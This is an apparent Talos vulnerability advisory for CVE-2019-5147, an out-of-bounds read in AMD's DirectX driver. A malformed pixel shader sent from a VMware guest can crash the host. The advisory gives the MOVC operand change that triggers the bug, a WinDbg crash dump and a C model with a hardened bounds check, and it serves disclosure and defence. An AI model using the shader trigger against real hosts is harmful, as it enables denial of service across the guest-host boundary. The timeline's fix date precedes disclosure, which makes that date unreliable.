CVE-2019-5147
An exploitable out-of-bounds read vulnerability exists in AMD ATIDXX64.DLL driver, version 26.20.13003.1007. A specially crafted pixel shader can cause a denial of service. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from VMware guest, affecting VMware host.
AMD ATIDXX64.DLL (26.20.13003.1007) running on a Radeon RX 550 / 550 Series card, under VMware Workstation 15 (15.5.0 build-14665864) with Windows 10 x64 as the guest VM
http://amd.com http://vmware.com
8.6 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
CWE-125: Out-of-bounds Read
This vulnerability can be triggered by supplying a malformed pixel shader (inside the VMware guest OS). Such an attack can be launched from VMware guest user mode to cause an out-of-bounds read in the vmware-vmx.exe process on the host, or theoretically through WebGL (a remote website).
Example shader:
ps_4_1
00000000: dcl_global_flags refactoringAllowed
00000001: dcl_constant_buffer cb0[3].xyzw, immediateIndexed
00000002: dcl_sampler sampler[0]
00000003: dcl_sampler sampler[1]
00000004: dcl_sampler sampler[2]
...
00000020: movc r1.x, sampler[1], r1.z, r1.x
By modifying the MOVC instruction (Component-wise conditional move) operand from “movc r1.x, r1.y, r1.z, r1.x” to “movc r1.x, sampler[1], r1.z, r1.x”, it is possible to cause an out-of-bounds read access violation.
As you can see below, after the shader operand modification, the RCX register used as the index in “MOV RDX,QWORD PTR [RAX+RCX*8]” is set to 0xffffffff.
(6b4.1720): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
atidxx64!AmdDxGsaFreeCompiledShader+0x3aeabc:
00007ff8`e3088d8c 488b14c8 mov rdx,qword ptr [rax+rcx*8] ds:00000152`ce649a10=????????????????
0:000> r
rax=0000014ace649a18 rbx=00007ff8e2c70000 rcx=00000000ffffffff
rdx=0000014ace6499f8 rsi=0000000000000010 rdi=0000014ace647fd8
rip=00007ff8e3088d8c rsp=00000036545796e0 rbp=0000000000000010
r8=0000000000000004 r9=00007ff8e35d1594 r10=0000000000000001
r11=0000014ace8e3398 r12=0000014ace647f00 r13=0000000000000000
r14=0000000000000000 r15=0000014ace6490e0
iopl=0 nv up ei ng nz ac po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010296
atidxx64!AmdDxGsaFreeCompiledShader+0x3aeabc:
00007ff8`e3088d8c 488b14c8 mov rdx,qword ptr [rax+rcx*8] ds:00000152`ce649a10=????????????????
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** WARNING: Unable to verify checksum for VENDOR_ONLY.exe
KEY_VALUES_STRING: 1
Key : AV.Fault
Value: Read
Key : Timeline.OS.Boot.DeltaSec
Value: 233600
Key : Timeline.Process.Start.DeltaSec
Value: 68
PROCESSES_ANALYSIS: 1
SERVICE_ANALYSIS: 1
STACKHASH_ANALYSIS: 1
TIMELINE_ANALYSIS: 1
Timeline: !analyze.Start
Name: <blank>
Time: 2019-10-11T12:02:20.144Z
Diff: 7855 mSec
Timeline: Dump.Current
Name: <blank>
Time: 2019-10-11T12:02:28.0Z
Diff: 0 mSec
Timeline: Process.Start
Name: <blank>
Time: 2019-10-11T12:01:20.0Z
Diff: 68000 mSec
Timeline: OS.Boot
Name: <blank>
Time: 2019-10-08T19:09:08.0Z
Diff: 233600000 mSec
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
FAULTING_IP:
atidxx64!AmdDxGsaFreeCompiledShader+3aeabc
00007ff8`e3088d8c 488b14c8 mov rdx,qword ptr [rax+rcx*8]
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ff8e3088d8c (atidxx64!AmdDxGsaFreeCompiledShader+0x00000000003aeabc)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000000
Parameter[1]: 00000152ce649a10
Attempt to read from address 00000152ce649a10
FAULTING_THREAD: 00001720
DEFAULT_BUCKET_ID: INVALID_POINTER_READ
PROCESS_NAME: VENDOR_ONLY.exe
FOLLOWUP_IP:
atidxx64!AmdDxGsaFreeCompiledShader+3aeabc
00007ff8`e3088d8c 488b14c8 mov rdx,qword ptr [rax+rcx*8]
READ_ADDRESS: 00000152ce649a10
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000000
EXCEPTION_PARAMETER2: 00000152ce649a10
WATSON_BKT_PROCSTAMP: 5cb740ee
WATSON_BKT_MODULE: atidxx64.dll
WATSON_BKT_MODSTAMP: 5d781adb
WATSON_BKT_MODOFFSET: 418d8c
WATSON_BKT_MODVER: 26.20.13003.1007
MODULE_VER_PRODUCT: Advanced Micro Devices, Inc. Radeon DirectX 11 Driver
BUILD_VERSION_STRING: 18362.1.amd64fre.19h1_release.190318-1202
MODLIST_WITH_TSCHKSUM_HASH: 2467318f4e32d63f6c5405aabc2a43724e772411
MODLIST_SHA1_HASH: 8d415343d816bb4896ee4592431a2c0c44961ee3
NTGLOBALFLAG: 470
PROCESS_BAM_CURRENT_THROTTLED: 0
PROCESS_BAM_PREVIOUS_THROTTLED: 0
APPLICATION_VERIFIER_FLAGS: 0
PRODUCT_TYPE: 1
SUITE_MASK: 272
DUMP_TYPE: fe
ANALYSIS_SESSION_HOST: CLAB
ANALYSIS_SESSION_TIME: 10-11-2019 14:02:20.0144
ANALYSIS_VERSION: 10.0.18362.1 amd64fre
THREAD_ATTRIBUTES:
OS_LOCALE: ENU
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
PROBLEM_CLASSES:
ID: [0n313]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0x1720]
Frame: [0] : atidxx64!AmdDxGsaFreeCompiledShader
ID: [0n285]
Type: [INVALID_POINTER_READ]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0x1720]
Frame: [0] : atidxx64!AmdDxGsaFreeCompiledShader
LAST_CONTROL_TRANSFER: from 00007ff8e304d1f4 to 00007ff8e3088d8c
STACK_TEXT:
00000036`545796e0 00007ff8`e304d1f4 : 00000000`00000000 00000000`00000000 00000036`00000000 00007ff8`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x3aeabc
00000036`545797c0 00007ff8`e2de6416 : 0000014a`ce647fd8 0000014a`ce837000 0000014a`ce65be00 0000014a`ce837001 : atidxx64!AmdDxGsaFreeCompiledShader+0x372f24
00000036`54579a30 00007ff8`e2dd66d0 : 0000014a`ce621b10 0000014a`ce640098 00000000`00000004 0000014a`ce621b10 : atidxx64!AmdDxGsaFreeCompiledShader+0x10c146
00000036`54579bf0 00007ff8`e2db5924 : 0000014a`ce621b10 0000014a`ce838640 00000036`5457a430 0000014a`ce621b10 : atidxx64!AmdDxGsaFreeCompiledShader+0xfc400
00000036`54579c70 00007ff8`e2cf9364 : 00000000`00000001 00000036`5457a430 0000014a`ce838640 00000036`5457a430 : atidxx64!AmdDxGsaFreeCompiledShader+0xdb654
00000036`5457a1f0 00007ff8`e347fa28 : 0000014a`c82f8188 00000036`5457a320 00000036`5457a430 0000014a`c9d4eac0 : atidxx64!AmdDxGsaFreeCompiledShader+0x1f094
00000036`5457a220 00007ff8`e346515b : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7a5758
00000036`5457a390 00007ff8`e3464c92 : 00000000`00000000 0000014a`ce838340 0000014a`ce592890 00000036`5457e0a0 : atidxx64!AmdDxGsaFreeCompiledShader+0x78ae8b
00000036`5457a3f0 00007ff8`e34956b3 : 0000014a`ce838340 00000000`00000000 0000014a`ce5f8730 00000036`5457e0a0 : atidxx64!AmdDxGsaFreeCompiledShader+0x78a9c2
00000036`5457e050 00007ff8`e3464b67 : 00000000`00000004 0000014a`ce8362c0 0000014a`ce5e5a90 0000014a`ce5a06c0 : atidxx64!AmdDxGsaFreeCompiledShader+0x7bb3e3
00000036`5457e080 00007ff8`e3534701 : 00000000`00000000 00000036`5457e3f0 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x78a897
00000036`5457e0e0 00007ff8`e2cf4cca : 00000000`00000000 00000000`00000000 00000036`5457e3f0 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x85a431
00000036`5457e120 00007ff8`e2cf4b13 : 0000014a`ce5bacd0 00000000`00000003 00000000`00000003 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x1a9fa
00000036`5457e160 00007ff8`e2c7c05e : 00000000`00000001 00000000`00000000 00000000`000007a8 00000000`00000003 : atidxx64!AmdDxGsaFreeCompiledShader+0x1a843
00000036`5457e1f0 00007ff8`e33e8146 : 00000000`00000000 00000036`5457e3f0 00000000`00000000 ffffffff`ffffffff : atidxx64!XdxQueryTlsLookupTable+0x6d6e
00000036`5457e230 00007ff8`e344bd09 : 00000000`00000000 0000014a`c8289d34 00000036`5457e3f0 00000000`00001400 : atidxx64!AmdDxGsaFreeCompiledShader+0x70de76
00000036`5457e3a0 00007ff8`e2c8d8b1 : 0000014a`ca159988 0000014a`c831b510 ffffffff`fffffffe 00007ff8`fee15113 : atidxx64!AmdDxGsaFreeCompiledShader+0x771a39
00000036`5457e3d0 00007ff8`fee18edc : 00000000`00000000 00000036`5457e600 0000014a`ca159978 00007ff9`04bfbabb : atidxx64!XdxQueryTlsLookupTable+0x185c1
00000036`5457e500 00007ff8`fee2295f : 00000036`00000001 0000014a`c8317928 0000014a`ca159978 0000014a`c830da10 : d3d11!CPixelShader::CLS::FinalConstruct+0x23c
00000036`5457e760 00007ff8`fee2289a : 00000036`5457ee40 00007ff8`fefd2388 0000014a`ca159840 00000000`000007a8 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3
00000036`5457e7f0 00007ff8`fee0ee58 : 0000014a`ca159868 00000036`5457ee40 00000036`5457ee70 00007ff8`fefd2388 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x152
00000036`5457e850 00007ff8`fee1b17d : ffffffff`fffffffe 0000014a`ca159840 00000000`00000014 00000000`00000001 : d3d11!CDevice::CreateLayeredChild+0xc88
00000036`5457ec90 00007ff8`fee1b950 : 0000014a`ca159840 00000000`00000009 00000000`00000188 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x6d
00000036`5457ee00 00007ff8`fee014f4 : 0000014a`c82eff20 00000000`00000009 0000014a`c8289ab0 0000014a`c82f0758 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
00000036`5457eff0 00007ff8`fee01463 : 0000014a`c8289ab0 00480063`0000c000 00000036`5457f350 00450056`005f0031 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x64
00000036`5457f050 00007ff8`fee011e8 : 0000014a`c82f0758 0000014a`c8289ab0 00000000`00000874 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x203
00000036`5457f200 00007ff7`6b3d2f16 : 0000014a`c830daf0 00000036`5457f2c8 0000014a`c82f0768 00000000`00000000 : d3d11!CDevice::CreatePixelShader+0x28
...
STACK_COMMAND: ~0s ; .cxr ; kb
THREAD_SHA1_HASH_MOD_FUNC: b83b420a1889acfa7499f03138efd1bbb8d42aaa
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 207ff31388f1e8a88dd8a5d3adca8cc37b630abf
THREAD_SHA1_HASH_MOD: 9140cc03c00bea0093c654d38b4e903d793400cd
FAULT_INSTR_CODE: c8148b48
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: atidxx64!AmdDxGsaFreeCompiledShader+3aeabc
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: atidxx64
IMAGE_NAME: atidxx64.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 5d781adb
FAILURE_BUCKET_ID: INVALID_POINTER_READ_c0000005_atidxx64.dll!AmdDxGsaFreeCompiledShader
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_atidxx64!AmdDxGsaFreeCompiledShader+3aeabc
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: atidxx64.dll
BUCKET_ID_IMAGE_STR: atidxx64.dll
FAILURE_MODULE_NAME: atidxx64
BUCKET_ID_MODULE_STR: atidxx64
FAILURE_FUNCTION_NAME: AmdDxGsaFreeCompiledShader
BUCKET_ID_FUNCTION_STR: AmdDxGsaFreeCompiledShader
BUCKET_ID_OFFSET: 3aeabc
BUCKET_ID_MODTIMEDATESTAMP: 5d781adb
BUCKET_ID_MODCHECKSUM: 1ae4e65
BUCKET_ID_MODVER_STR: 0.0.0.0
BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_READ_
FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
FAILURE_SYMBOL_NAME: atidxx64.dll!AmdDxGsaFreeCompiledShader
TARGET_TIME: 2019-10-11T12:02:43.000Z
OSBUILD: 18362
OSSERVICEPACK: 329
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt SingleUserTS
USER_LCID: 0
OSBUILD_TIMESTAMP: unknown_date
BUILDDATESTAMP_STR: 190318-1202
BUILDLAB_STR: 19h1_release
BUILDOSVER_STR: 10.0.18362.1.amd64fre.19h1_release.190318-1202
ANALYSIS_SESSION_ELAPSED_TIME: 5b08
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:invalid_pointer_read_c0000005_atidxx64.dll!amddxgsafreecompiledshader
FAILURE_ID_HASH: {08b458dc-1323-2abb-9f1a-d0ac543a793c}
Followup: MachineOwner
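The register dump above shows RAX holding a table base and RCX holding the 0xffffffff index that the rewritten MOVC operand produced. The following C model is added here as an illustration; it is not the AMD driver's code and does not reproduce its internals. It reproduces the effective-address arithmetic of `mov rdx,qword ptr [rax+rcx*8]` from the dumped register values, shows how an operand-to-slot lookup that hands back a "not found" sentinel turns into a huge array index when the caller never validates it, and contrasts that with a resolver that checks the operand kind and range before indexing. The operand kinds, the 4096-entry temp-register table and the SLOT_NOT_FOUND sentinel are assumptions made for the example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed operand model for illustration only; not the AMD driver's real types. */
enum operand_kind { OPK_TEMP, OPK_CONSTBUF, OPK_SAMPLER, OPK_IMMEDIATE };

struct operand {
    enum operand_kind kind;   /* r1 -> OPK_TEMP, sampler[1] -> OPK_SAMPLER */
    uint32_t index;           /* register number: 1 for both r1 and sampler[1] */
};

#define TEMP_SLOTS     4096u         /* assumed size of the temp-register slot table */
#define SLOT_NOT_FOUND 0xffffffffu   /* assumed "no slot" sentinel; same value as RCX in the dump */

static uint64_t temp_table[TEMP_SLOTS];

/* Unchecked path: only temp registers map to a slot; any other operand kind
 * yields the sentinel, which a caller that indexes the table directly will
 * treat as an ordinary (huge) index. */
uint32_t slot_for_operand_unchecked(const struct operand *op)
{
    if (op->kind == OPK_TEMP && op->index < TEMP_SLOTS)
        return op->index;
    return SLOT_NOT_FOUND;
}

/* Effective address computed by `mov rdx,qword ptr [rax+rcx*8]`: the 32-bit
 * slot is zero-extended, scaled by 8 and added to the 64-bit table base.
 * A slot of 0xffffffff lands 0x7fffffff8 bytes (just under 32 GiB) past the base. */
uint64_t effective_address(uint64_t table_base, uint32_t slot)
{
    return table_base + (uint64_t)slot * 8u;
}

/* Hardened path: validate the operand before it is used as an index. MOVC's
 * condition operand must be a temp register whose number lies inside the table;
 * a sampler operand is rejected here instead of reaching the table lookup. */
bool resolve_movc_condition(const struct operand *op, uint64_t *value_out)
{
    if (op->kind != OPK_TEMP)
        return false;
    if (op->index >= TEMP_SLOTS)
        return false;
    if (value_out != NULL)
        *value_out = temp_table[op->index];
    return true;
}

int main(void)
{
    const struct operand sampler1 = { OPK_SAMPLER, 1 };   /* operand from "movc r1.x, sampler[1], r1.z, r1.x" */
    const struct operand r1       = { OPK_TEMP, 1 };      /* operand from the original "movc r1.x, r1.y, r1.z, r1.x" */
    uint32_t slot = slot_for_operand_unchecked(&sampler1);
    uint64_t rax  = 0x0000014ace649a18ULL;                /* rax from the register dump above */

    printf("unchecked slot for sampler[1]: 0x%08x\n", slot);
    printf("[rax+slot*8] = 0x%016llx (dump reports 00000152ce649a10)\n",
           (unsigned long long)effective_address(rax, slot));
    printf("hardened: sampler[1] accepted? %s; r1 accepted? %s\n",
           resolve_movc_condition(&sampler1, NULL) ? "yes" : "no",
           resolve_movc_condition(&r1, NULL) ? "yes" : "no");
    return 0;
}
```

Plugging the dumped RAX into effective_address with the sentinel index gives exactly the faulting address 00000152ce649a10 reported by the exception record, which confirms that the read is RAX plus 0xffffffff scaled by eight rather than an unrelated pointer corruption. The hardened resolver fails closed on the operand kind first, so a rejected operand never reaches the arithmetic at all.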
---------
2019-10-23 - Vendor Disclosure
2019-01-13 - Vendor confirmed fix and no issues found on versions 15.5.1 with 20.1.1 AMD drivers
2020-01-21 - Public Release
Discovered by Piotr Bania of Cisco Talos.